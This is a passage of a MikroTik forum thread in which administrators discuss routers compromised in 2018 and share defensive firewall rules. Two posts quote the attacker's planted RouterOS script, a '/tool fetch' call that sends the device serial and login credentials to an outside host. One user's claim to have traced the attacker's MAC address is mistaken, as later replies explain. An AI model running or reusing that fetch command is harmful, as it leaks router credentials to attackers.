Community discussions

MikroTik App
 
0ldman
Forum Guru
Forum Guru
Topic Author
Posts: 1447
Joined: Thu Jul 27, 2006 5:01 am

bug persists after updating to 6.42.3

Sat Jun 16, 2018 2:13 am

We had issues with the src address lists in the firewall letting through all traffic rather than only the traffic listed, so of course they blew right through a non-functional firewall.

They put two scripts in there, one was enabling ppoe out, the other was this.
{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=7da1df40bdee0309&action=upload&sncode=BDDC61FCE64D0922DD64998709BB639A&dynamic=static&user=myusername&pwd=mypassword")}
When you go to this site it tries to infect your system right off. Looks like they're trying to get a bunch of infected machines mining coins for them. Not sure what their intent is with Mikrotik hardware.
 
anav
Forum Guru
Forum Guru
Posts: 4614
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: bug persists after updating to 6.42.3

Sat Jun 16, 2018 2:38 am

WIthout confirmation that you are following stated directions..........
a. you are using latest OS
b. have closed down the router from external access.

Then one can expect to be hacked unfortunately.
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
User avatar
zimzum
just joined
Posts: 9
Joined: Thu Oct 19, 2017 1:37 pm
Location: Murcia

Re: bug persists after updating to 6.42.3

Sat Jun 16, 2018 12:00 pm

I have the same problem with two mikrotiks. Both have the last firmware and router os version from two weeks.
 
msatter
Forum Guru
Forum Guru
Posts: 1703
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: bug persists after updating to 6.42.3

Sat Jun 16, 2018 12:19 pm

One RB4011 (cooled) and a RB760iGS (hEX S) in series. The 4011 Does PPPoE/IKEv2.
The cooler: viewtopic.php?f=3&t=138613&start=300#p799879
Running:
RouterOS 6.47 / Winbox 3.24 / MikroTik APP 1.3.14
 
gordon65
just joined
Posts: 1
Joined: Sat Jun 21, 2014 1:16 am

Re: bug persists after updating to 6.42.3

Sat Jun 16, 2018 7:12 pm

Hello,

here are some more information about the changes that have been made:

i immediately updated my version. I can't tell which version I had before

Scripts:
{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=bdee03097da1df40&action=upload&sncode=17E88147941B12F2E415872A518FBD9F&dynamic=static")}
log.PNG
radius.PNG
You do not have the required permissions to view the files attached to this post.
 
0ldman
Forum Guru
Forum Guru
Topic Author
Posts: 1447
Joined: Thu Jul 27, 2006 5:01 am

Re: bug persists after updating to 6.42.3

Sat Jun 16, 2018 10:22 pm

I'm very aware of those.

What I'm talking about is how we got hit with one.

Address lists are being ignored in the filter section of the firewall randomly.

We noticed it around 6.30 and it randomly pops up ever since. I had my DNS blocked to all but allowed address list of "DNS". When I updated to 6.30 I had to change all of my rules as the DNS address list was ignored. The same was happening with my port 80 and winbox rules, only in reverse. Instead of only allowing my addresses it allowed all addresses and I didn't catch it until we had already been hacked.

What I'm talking about is a system that *was* locked down to only allowed addresses through firewall filter rules. The address lists were ignored.
 
User avatar
leopiri
just joined
Posts: 5
Joined: Fri May 08, 2009 9:25 am

Re: bug persists after updating to 6.42.3

Mon Jun 18, 2018 12:44 am

I had the same problem, winbox port blocked only for network provider, latest version and firmware, strong users and passwords, I noticed this on June 15 at 10pm.
 
R1CH
Forum Veteran
Forum Veteran
Posts: 926
Joined: Sun Oct 01, 2006 11:44 pm

Re: bug persists after updating to 6.42.3

Mon Jun 18, 2018 7:54 pm

If you didn't change passwords after upgrading to fix the winbox exploit, this is likely how they are gaining access. Change all passwords, preferably after netinstall to ensure no remaining backdoors.
 
User avatar
katem07
just joined
Posts: 17
Joined: Mon Apr 10, 2017 11:35 am
Location: SAR
Contact:

Re: bug persists after updating to 6.42.3

Tue Jun 19, 2018 12:35 am

Secure u'r Firewall by this rules , Modify in-interface as your's wan label
/ip firewall filter
add action=passthrough chain=unused-hs-chain comment=\
    "###### Access Protection Start" disabled=yes
add action=add-src-to-address-list address-list=Hacker address-list-timeout=0s \
    chain=input comment="Add External Access Tries" dst-port=\
    21,22,23,80,443,8291,8728,8729 in-interface=WAN log=yes log-prefix=\
    "Security System <>" protocol=tcp
add action=drop chain=input comment="Block External Access to Ports" dst-port=\
    21,22,23,80,443,8291,8728,8729 in-interface=WAN protocol=tcp \
add action=drop chain=input comment="Block External Access to DNS" dst-port=53 \
    in-interface=WAN protocol=tcp
add action=drop chain=input comment="Block External Access to DNS" dst-port=53 \
    in-interface=WAN protocol=udp
add action=passthrough chain=unused-hs-chain comment=\
    "###### Access Protection End" disabled=yes
By the way , i tracked the hackers MAC-ADDRESS and i found this result : E4:8D:8C:3A:E5:96 .. which it belongs to RouterBoard.Com !
Last edited by katem07 on Tue Jun 19, 2018 11:37 am, edited 1 time in total.
Knowledge Sharing ... :idea: :wink:
  • Facebook:Fb.com/katem07
  • Ahmed Mosilly
  • Regards.
 
florid
newbie
Posts: 38
Joined: Wed Dec 20, 2017 6:27 am

Re: bug persists after updating to 6.42.3

Tue Jun 19, 2018 4:29 am

By the way , i tracked the hackers MAC-ADDRESS and i found this result : E4:8D:8C:3A:E5:96 .. which it belongs to RouterBoard.Com !
That's your WAN interface MAC address.
 
User avatar
katem07
just joined
Posts: 17
Joined: Mon Apr 10, 2017 11:35 am
Location: SAR
Contact:

Re: bug persists after updating to 6.42.3

Tue Jun 19, 2018 11:28 am

By the way , i tracked the hackers MAC-ADDRESS and i found this result : E4:8D:8C:3A:E5:96 .. which it belongs to RouterBoard.Com !
That's your WAN interface MAC address.
How did u know that ! :D

No buddy i have checked all my ether(s) and bridges Mac Addresses , that's not one of it
Knowledge Sharing ... :idea: :wink:
  • Facebook:Fb.com/katem07
  • Ahmed Mosilly
  • Regards.
 
Modestas
just joined
Posts: 18
Joined: Mon Jul 16, 2012 10:59 am
Location: Vilnius, Lithuania

Re: bug persists after updating to 6.42.3

Tue Jun 19, 2018 3:17 pm

By the way , i tracked the hackers MAC-ADDRESS and i found this result : E4:8D:8C:3A:E5:96 .. which it belongs to RouterBoard.Com !
That's your WAN interface MAC address.
How did u know that ! :D
I really wonder how you have pulled MAC address from remote server RouterBoard.Com
No buddy i have checked all my ether(s) and bridges Mac Addresses , that's not one of it
What about your ISP gateway MAC address?

As side note, F5 blog https://www.f5.com/labs/articles/threat ... kim-summit says there was attack on Jun 11 targeting some known vulnerabilities and Mikrotik's port 8291 was not forgotten. See Fig 3 for attack destination country stats.
 
User avatar
katem07
just joined
Posts: 17
Joined: Mon Apr 10, 2017 11:35 am
Location: SAR
Contact:

Re: bug persists after updating to 6.42.3

Wed Jun 20, 2018 1:02 pm

I really wonder how you have pulled MAC address from remote server RouterBoard.Com
By Firewall Filter i did Log for the attacker src address , so when he attacks my host , Mikrotik Server logs his Src address and (a) src Mac-Address
The src mac address logged in my Server log not belong's to me , That's all buddy
What about your ISP gateway MAC address?

As side note, F5 blog https://www.f5.com/labs/articles/threat ... kim-summit says there was attack on Jun 11 targeting some known vulnerabilities and Mikrotik's port 8291 was not forgotten. See Fig 3 for attack destination country stats.
I really wondering about possibility to be my ISP wan .. so i didn't say that it's attacker MAC , i just said it's belong to RouterBoard.com
But i'm sure that it's not my WAN interface MAC address

i checked out F5 Blog , and i found the same ip subnet of the attacker bottled in my dynamic address list

188.246.234.62 | in my dynamic address list
188.246.234.60 | in F5 article
Maybe they did it because of the Turkish elections cause My ISP Provider is Turktelecom

Also i attached all attackers ip-address who attacked my nine servers if u wanna block it in advance :)
Regard's
You do not have the required permissions to view the files attached to this post.
Knowledge Sharing ... :idea: :wink:
  • Facebook:Fb.com/katem07
  • Ahmed Mosilly
  • Regards.
 
tippenring
Member Candidate
Member Candidate
Posts: 243
Joined: Thu Oct 02, 2014 8:54 pm
Location: St Louis MO
Contact:

Re: bug persists after updating to 6.42.3

Wed Jun 20, 2018 4:59 pm


By Firewall Filter i did Log for the attacker src address , so when he attacks my host , Mikrotik Server logs his Src address and (a) src Mac-Address
The src mac address logged in my Server log not belong's to me , That's all buddy
MAC addresses work only at the broadcast domain level (layer 2). No MAC address is ever routed to another subnet. The MAC addresses on a frame are always updated by routers. So no, you do not have the MAC of your attacker. You have the MAC of the device in the broadcast domain that sent you the packet.
 
User avatar
katem07
just joined
Posts: 17
Joined: Mon Apr 10, 2017 11:35 am
Location: SAR
Contact:

Re: bug persists after updating to 6.42.3

Thu Jun 21, 2018 12:26 pm

It's really a valuable information , txn man .
Knowledge Sharing ... :idea: :wink:
  • Facebook:Fb.com/katem07
  • Ahmed Mosilly
  • Regards.

Who is online

Users browsing this forum: RackKing and 71 guests